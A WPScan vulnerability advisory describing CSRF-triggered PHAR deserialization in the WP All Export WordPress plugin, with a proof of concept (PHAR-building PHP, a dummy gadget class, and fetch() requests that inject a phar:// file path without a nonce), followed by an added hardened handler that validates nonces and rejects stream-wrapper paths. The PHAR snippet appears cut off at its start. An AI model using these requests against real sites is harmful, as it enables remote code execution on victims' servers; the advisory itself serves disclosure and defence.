WPVDB-ID: 0A08E49D-D34E-4140-A15D-AD64444665A3
Source: wpvulndb (wpscan.com)
Author: Alex Sanford
Published: Nov 21, 2023 - 12:00 a.m.

WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF

Tags: wordpress, plugin, csrf, phar deserialization, remote code execution

AI Score: 9.7
Confidence: High
EPSS: 0.001
Percentile: 44.2%

Description

The plugin does not check nonce tokens early enough in the request lifecycle. An attacker who can upload files (Author role or above) can therefore make a logged-in user perform unwanted actions via CSRF, leading to PHAR deserialization of an uploaded archive, which may result in remote code execution.

PoC

1. Ensure your WordPress installation is using PHP version 7.4 or earlier.

2. Create a poc.phar file using the following code, and add it to the root directory of the server:

       startBuffering();
       $phar->addFromString( 'test.txt', 'text' );
       $phar->setStub( '' );
       $phar->setMetadata( new Evil() );
       $phar->stopBuffering();
       echo "$pharFile successfully created" . PHP_EOL;
       } catch (Exception $e) {
           echo $e->getMessage();
       }

3. Add the following code to the server to simulate a gadget:

       class Evil {
           function __wakeup() {
               die('Arbitrary deserialization');
           }
       }

4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the /var/www/html directory if needed.

       await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
           "credentials": "include",
           "headers": {
               "Content-Type": "application/x-www-form-urlencoded",
           },
           "method": "POST",
           "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
           "mode": "cors",
       });

5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output.

       await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", {
           "credentials": "include",
           "headers": {},
           "method": "GET",
           "mode": "cors",
       });
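For contrast with the request flow above, here is a hardened admin-ajax handler for the same pattern: the nonce is verified before any request value is used, and a user-supplied path that carries a stream wrapper such as phar:// is rejected before it reaches a filesystem call. This is an added illustration, not code from WP All Export or WPScan; the example_ names, the nonce action string and the capability chosen are assumptions, while wp_verify_nonce(), current_user_can(), wp_send_json_error(), wp_send_json_success(), wp_upload_dir(), sanitize_text_field() and wp_unslash() are real WordPress functions.

```php
<?php
// Added example, not code from WP All Export: an admin-ajax handler that
// verifies the nonce before touching request data and refuses stream-wrapper
// paths such as phar://. Names prefixed "example_" are hypothetical.

// True only for a wrapper-free path that resolves to a file inside $base_dir.
function example_safe_export_path( string $path, string $base_dir ): bool {
    // A scheme prefix (phar://, php://, data://, ftp://, ...) is refused outright:
    // the phar:// wrapper is what makes file_exists()/fopen() on attacker-chosen
    // input unserialize() the archive metadata on PHP <= 7.4.
    if ( preg_match( '#^[a-z][a-z0-9+.\-]*://#i', $path ) ) {
        return false;
    }
    $real = realpath( $path );
    $base = realpath( $base_dir );
    if ( false === $real || false === $base || ! is_file( $real ) ) {
        return false;
    }
    // Containment: the resolved path must live under the resolved base directory.
    return 0 === strncmp( $real, $base . DIRECTORY_SEPARATOR, strlen( $base ) + 1 );
}

// Handler for the "options" export action; the ordering of the checks is the point.
function example_handle_export_options(): void {
    // 1. Authorisation first.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Forbidden', 403 );
    }
    // 2. CSRF check next, before any value from the request is used.
    $nonce = isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'example_export_options' ) ) {
        wp_send_json_error( 'Invalid nonce', 403 );
    }
    // 3. Only now read and validate the user-supplied file path.
    $filepath = isset( $_POST['filepath'] ) ? sanitize_text_field( wp_unslash( $_POST['filepath'] ) ) : '';
    $uploads  = wp_upload_dir();
    if ( '' === $filepath || ! example_safe_export_path( $filepath, $uploads['basedir'] ) ) {
        wp_send_json_error( 'Invalid file path', 400 );
    }
    // $filepath is now a plain file under the uploads directory; safe to hand to
    // filesystem functions from here on.
    wp_send_json_success( array( 'filepath' => $filepath ) );
}
add_action( 'wp_ajax_example_export_options', 'example_handle_export_options' );
```

Note that wp_send_json_error() terminates the request, so each failed check ends the handler without falling through.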

